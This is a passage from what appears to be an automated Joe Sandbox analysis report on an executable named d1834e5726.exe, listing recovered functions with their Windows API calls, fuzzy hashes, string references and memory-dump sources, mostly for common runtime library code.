Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: dfdf6f074fe9dfe469198694fa364ccb268f4d0a495d3d536f07aa06670c97dd
Instruction ID: 7736ae442610e9907bfbd2ed0677abe5656bf3d727b0bea4e556abca18e7cfa9
Opcode Fuzzy Hash: dfdf6f074fe9dfe469198694fa364ccb268f4d0a495d3d536f07aa06670c97dd
Instruction Fuzzy Hash: 5711C4F29016997F672137B3ADC9C7F295CDF4439A711042AF905D1281FE28DD01817E

Function 004F429C Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,004F311E,00000000,00000001,?,?,?,004EFC5E,?,00000000,00000000), ref: 004F42B3
GetLastError.KERNEL32(?,004F311E,00000000,00000001,?,?,?,004EFC5E,?,00000000,00000000,?,?,?,004EF5A4,?), ref: 004F42BF

Part of subcall function 004F4310: CloseHandle.KERNEL32(FFFFFFFE,004F42CF,?,004F311E,00000000,00000001,?,?,?,004EFC5E,?,00000000,00000000,?,?), ref: 004F4320

___initconout.LIBCMT ref: 004F42CF

Part of subcall function 004F42F1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004F428D,004F310B,?,?,004EFC5E,?,00000000,00000000,?), ref: 004F4304

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,004F311E,00000000,00000001,?,?,?,004EFC5E,?,00000000,00000000,?), ref: 004F42E4

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: beeea429308866e40f5dac41dbf8223daa2e30b11d7e3d801495b46097e02bb0
Instruction ID: 208f67091c6c7e2551cb53f20588245a241add431e586c98f5f9792c4756819b
Opcode Fuzzy Hash: beeea429308866e40f5dac41dbf8223daa2e30b11d7e3d801495b46097e02bb0
Instruction Fuzzy Hash: 24F0F837500118BBCF221FE69C049AE3F26EF893A1B014471FA0895230CA328920DBA8

Function 004E38D1 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 004E38E3
GetCurrentThreadId.KERNEL32 ref: 004E38F2
GetCurrentProcessId.KERNEL32 ref: 004E38FB
QueryPerformanceCounter.KERNEL32(?), ref: 004E3908

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 20916d76fe32a96991029c62488466a31a32a17b242dfcae133c44c7e97df1f4
Instruction ID: 3bfa3aeba0c157efc870a2a102dd06777a3c9ec1d827bf4950336c330389af47
Opcode Fuzzy Hash: 20916d76fe32a96991029c62488466a31a32a17b242dfcae133c44c7e97df1f4
Instruction Fuzzy Hash: E8F05F75D1020DEBCB00DBB4DA8999EBBF4EF1C200B9145A5A412E6110EA30AB54DB55

Function 004E92ED Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,004E91EE,?,?,00000000,00000000,00000000,?), ref: 004E9312

Strings

RCC, xrefs: 004E932C
MOC, xrefs: 004E9324

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 9ee6e714edf571f2591ee14cf96e252b48342cc5ef001b0c4d4301a3d2f09896
Instruction ID: 45d0440b6ee468982672d904edc0a2a54e002cc86dd0d13e214571b77003e069
Opcode Fuzzy Hash: 9ee6e714edf571f2591ee14cf96e252b48342cc5ef001b0c4d4301a3d2f09896
Instruction Fuzzy Hash: BA41A931900248EFCF11DF96C981AEE7BB5FF48305F1880AAFA0867291D3399D51CB58

Function 004E329D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,004E320F,?,?,?,?,004E3233,000000FF,?,?,?,004E314B,00000000), ref: 004E32D5
GetSystemTimeAsFileTime.KERNEL32(?,98F3976D,?,?,004F5C69,000000FF,?,004E320F,?,?,?,?,004E3233,000000FF,?), ref: 004E32D9

Strings

f2N, xrefs: 004E32CF

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: Time$FileSystem$Precise
String ID: f2N
API String ID: 743729956-3473888870
Opcode ID: 6f0f704868a079bb56e07cb38a0c1639da0f50e92df2f46d70f276a42fd62300
Instruction ID: 055cf9c32bf43508d6ec10f5f259e4844838330a6048965798c954becb4177c1
Opcode Fuzzy Hash: 6f0f704868a079bb56e07cb38a0c1639da0f50e92df2f46d70f276a42fd62300
Instruction Fuzzy Hash: 5BF03772A04598EFC7018F45EC48B6977A8FB05B15F114577E91293790D7356900CB98

Function 004E99FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 004E9A3C

Strings

f2N, xrefs: 004E9A2C
InitializeCriticalSectionEx, xrefs: 004E9A0C

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$f2N
API String ID: 2593887523-3968345832
Opcode ID: eb102753a61a030dd00031c61e22919c9f5787a2c6e8aac1fda9c94d3c76ff47
Instruction ID: 5796170e23a566131090ab9c5b1cc6ca1491ae3ff999f14c186e6b4c5c656c69
Opcode Fuzzy Hash: eb102753a61a030dd00031c61e22919c9f5787a2c6e8aac1fda9c94d3c76ff47
Instruction Fuzzy Hash: 8CE0923154025CBBCB216F42EC05EAE3F11DF40BA1F114032FE18251A1C67A4C21DBD9

Function 004E98FD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 004E9931

Strings

f2N, xrefs: 004E9927
FlsAlloc, xrefs: 004E990D

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc$f2N
API String ID: 2773662609-3652087093
Opcode ID: 7c3d8a78527493fb93c79e5be52444f79823a08b53e9231530b7f879ec98425b
Instruction ID: 41c02121851a7dbc20c9537618e039e99ee3877a906923dbdf3cad1d46ef026a
Opcode Fuzzy Hash: 7c3d8a78527493fb93c79e5be52444f79823a08b53e9231530b7f879ec98425b
Instruction Fuzzy Hash: C6E0C27168426CB3C6207792AC06FBE7E44CB40B61B120037FE05212E28AAD1C2186EE

Analysis Process: d1834e5726.exePID: 6172, Parent PID: 5312COMMON

Non-executed Functions

Function 004E17D0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 293fileCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000), ref: 004E185C
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004E1885
CloseHandle.KERNEL32(00000000), ref: 004E1895
CloseHandle.KERNEL32(00000000), ref: 004E1B20
CloseHandle.KERNEL32(00000000), ref: 004E1B35

Strings

(, xrefs: 004E18D0

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: CloseHandle$File$ReadSize
String ID: (
API String ID: 2509154390-3887548279
Opcode ID: c6825ebe0d36bf865c3cc6505edcf1fb1ac4ab4c6c0cbcfa2ed89ae3fea0b994
Instruction ID: ce394cc38b9e22c3950c84662fca1a6e48408651b17ca16b05e4ff261ee10224
Opcode Fuzzy Hash: c6825ebe0d36bf865c3cc6505edcf1fb1ac4ab4c6c0cbcfa2ed89ae3fea0b994
Instruction Fuzzy Hash: E3A12972D402548FCB10DFB9DD85AAEFBB6BF4A310F14162AE801A7361E7389941CB58

Function 004F1A10 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7946e7d3bd8a4c71b1004167feaff1146a0b4289e9922db4fb30fff94b398ee0
Instruction ID: c395606fd1b3a71c2300a007e3a781ce5cf0bcb956fb9cbc4c5ea10631d6fa53
Opcode Fuzzy Hash: 7946e7d3bd8a4c71b1004167feaff1146a0b4289e9922db4fb30fff94b398ee0
Instruction Fuzzy Hash: 22023D71E01219DBDF14CFA9C980AAEBBB1FF49314F24826ADA15E7350D735AA01CB94

Function 004ED922 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004EDA12

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 56284418b3cac183010dd286b12ba015729ffcab22b5262812da05654a76aed4
Instruction ID: 9cb8db5a398baf25ea408c6947827964e0fff2bb0efb087fbed6c2c368c6d888
Opcode Fuzzy Hash: 56284418b3cac183010dd286b12ba015729ffcab22b5262812da05654a76aed4
Instruction Fuzzy Hash: 2471D4B1D041985FDF20EF26CC89ABAB7B9EF05305F1441EBE449A7251EA385E858F18

Function 004E39F1 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 004E39FD
IsDebuggerPresent.KERNEL32 ref: 004E3AC9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004E3AE2
UnhandledExceptionFilter.KERNEL32(?), ref: 004E3AEC

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 42e566195971a8affdb01bd09a1e9deafb93bf1cad67a6f74299b8098f6b5023
Instruction ID: 6859b25dada4fd463706a887458e82804bdefdc2cb6406f6515909c40dbb0cd7
Opcode Fuzzy Hash: 42e566195971a8affdb01bd09a1e9deafb93bf1cad67a6f74299b8098f6b5023
Instruction Fuzzy Hash: 00312975C0521C9BDB21DF65DD89BCDBBB8AF48305F1041AAE40DAB250E7749B84CF49

Function 004E13F0 Relevance: 4.6, APIs: 3, Instructions: 149encryptionCOMMON

Download Yara Rule

APIs

CoResumeClassObjects.OLE32 ref: 004E150E
CryptContextAddRef.ADVAPI32(00000000,00000000,00000000), ref: 004E1521
GetLastError.KERNEL32 ref: 004E1583

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ClassContextCryptErrorLastObjectsResume
String ID:
API String ID: 88197900-0
Opcode ID: 473e48b583952ff5293705384faad5d733607fd9199ebf8496d5f7629d15d115
Instruction ID: 6fb79226ae56b7aef96ded89034f9f412758e8d320faf64dc3843e2740487f58
Opcode Fuzzy Hash: 473e48b583952ff5293705384faad5d733607fd9199ebf8496d5f7629d15d115
Instruction Fuzzy Hash: FB5180708052988BDF11CFA9D445BEEBFB0BF0A315F1441AAD845B3381C3795A05CFA9

Function 004E1D30 Relevance: 18.2, APIs: 12, Instructions: 176threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 004E1D63
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004E1D76

Part of subcall function 004E234A: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004E2E92
Part of subcall function 004E234A: ___raise_securityfailure.LIBCMT ref: 004E2F7A

GetCurrentThreadId.KERNEL32 ref: 004E1DFA

Part of subcall function 004E2E15: WaitForSingleObjectEx.KERNEL32(004E17D0,000000FF,00000000,?,?,?,004E1E17,?,004E17D0,00000000), ref: 004E2E21
Part of subcall function 004E2E15: GetExitCodeThread.KERNEL32(004E17D0,00000000,?,?,004E1E17,?,004E17D0,00000000), ref: 004E2E3A
Part of subcall function 004E2E15: CloseHandle.KERNEL32(004E17D0,?,?,004E1E17,?,004E17D0,00000000), ref: 004E2E4C

Part of subcall function 004E6F9F: CreateThread.KERNEL32(00000000,00000000,004E70B7,00000000,00000000,00000000,?,?,?,?,004E1DD3,00000000,00000000), ref: 004E6FE8
Part of subcall function 004E6F9F: GetLastError.KERNEL32(?,?,?,?,004E1DD3,00000000,00000000), ref: 004E6FF4
Part of subcall function 004E6F9F: __dosmaperr.LIBCMT ref: 004E6FFB

GetCurrentThreadId.KERNEL32 ref: 004E1E95
std::_Throw_Cpp_error.LIBCPMT ref: 004E1EED
std::_Throw_Cpp_error.LIBCPMT ref: 004E1EFF
std::_Throw_Cpp_error.LIBCPMT ref: 004E1F0E
std::_Throw_Cpp_error.LIBCPMT ref: 004E1F1D
std::_Throw_Cpp_error.LIBCPMT ref: 004E1F2C
std::_Throw_Cpp_error.LIBCPMT ref: 004E1F3E
std::_Throw_Cpp_error.LIBCPMT ref: 004E1F50
std::_Throw_Cpp_error.LIBCPMT ref: 004E1F62

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$Thread$CurrentHandleModule$CloseCodeCreateErrorExitFeatureFileLastNameObjectPresentProcessorSingleWait___raise_securityfailure__dosmaperr
String ID:
API String ID: 610485761-0
Opcode ID: 8c7cc4c47a7f79e7cd6bd81148d5d372a0c3d610bf0d06e678a12313079f2852
Instruction ID: b20f996ec65aa9b0dade429103d1e6096bef79de02afadcdeaa339789c258213
Opcode Fuzzy Hash: 8c7cc4c47a7f79e7cd6bd81148d5d372a0c3d610bf0d06e678a12313079f2852
Instruction Fuzzy Hash: AB51D1B1D812499BEB10EFA6CD02BDFB6B4AF05715F040269E914373D0E7F96904CAA9

Function 004E4650 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004E4687
___except_validate_context_record.LIBVCRUNTIME ref: 004E468F
_ValidateLocalCookies.LIBCMT ref: 004E4718
__IsNonwritableInCurrentImage.LIBCMT ref: 004E4743
_ValidateLocalCookies.LIBCMT ref: 004E4798

Strings

csm, xrefs: 004E472D
]CN, xrefs: 004E4735, 004E473E, 004E474F
f2N, xrefs: 004E475C

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: ]CN$csm$f2N
API String ID: 1170836740-4281818672
Opcode ID: 86a3ff014dd28bbef5893d61a9e3dd883c1731beaa14df2a05da0064921b5484
Instruction ID: f0ee2f20e658cd107181b30a80d5897964b80284da1c5876d360a2d0d408edd8
Opcode Fuzzy Hash: 86a3ff014dd28bbef5893d61a9e3dd883c1731beaa14df2a05da0064921b5484
Instruction Fuzzy Hash: F041EA749002889BCF10DF6BC884A9E7BB1FF86316F14855BE9145B392C739AD11CBD9

Function 004F3FDE Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,004F3FC9,?,?,?,?,?,?,?,?,?,?), ref: 004F4084
__alloca_probe_16.LIBCMT ref: 004F413F
__alloca_probe_16.LIBCMT ref: 004F41CE
__freea.LIBCMT ref: 004F4219
__freea.LIBCMT ref: 004F421F
__freea.LIBCMT ref: 004F4255
__freea.LIBCMT ref: 004F425B
__freea.LIBCMT ref: 004F426B

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 138fc07833c29fa64bd5b0da5ab7febe6d8de2372145f6eced73ccaac467e53b
Instruction ID: 8f09314e629e486dd1eb306bb9ed3d74aa021fd0bb599afa1b116f81e28217cc
Opcode Fuzzy Hash: 138fc07833c29fa64bd5b0da5ab7febe6d8de2372145f6eced73ccaac467e53b
Instruction Fuzzy Hash: 3B71D23290020D6BDF209E958D81BBF77A9AF89355F16016BFB04A7381DF3D8D4187A9

Function 004EC28B Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004EC311

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 6f50279ee7fba881e46e44fc6ac24256dd30adf8a6b45f72db007344eb616516
Instruction ID: 78f12f27d62d3ded8f5f901ff6426e784df0c48a370059c5c665017b964e3206
Opcode Fuzzy Hash: 6f50279ee7fba881e46e44fc6ac24256dd30adf8a6b45f72db007344eb616516
Instruction Fuzzy Hash: 24B158729002E5AFDB118F6ACCC1BBF7BA5EF55311F144157E904AB382D778A902C7A8

Function 004E9BBE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,004E9CCD,004E20CA,?,00000000,004E2CB3,004E20CC,?,004E99D6,00000022,FlsSetValue,004F6F54,004F6F5C,004E2CB3), ref: 004E9C7F

Strings

api-ms-, xrefs: 004E9C15
ext-ms-, xrefs: 004E9C29

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 7d36d20435da772b93ab9856b512b61643e36e1aedf97770ff7fd2ed79235f94
Instruction ID: b57c0fcb4fbb1178145c58b20c90dc1f3e423b263c6445021c01c9bda7270e53
Opcode Fuzzy Hash: 7d36d20435da772b93ab9856b512b61643e36e1aedf97770ff7fd2ed79235f94
Instruction Fuzzy Hash: C521E732A00298ABD721AB22DD84A7B37D9EF41766F340172E916A73D0D638FD11C6DC

Function 004E720B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

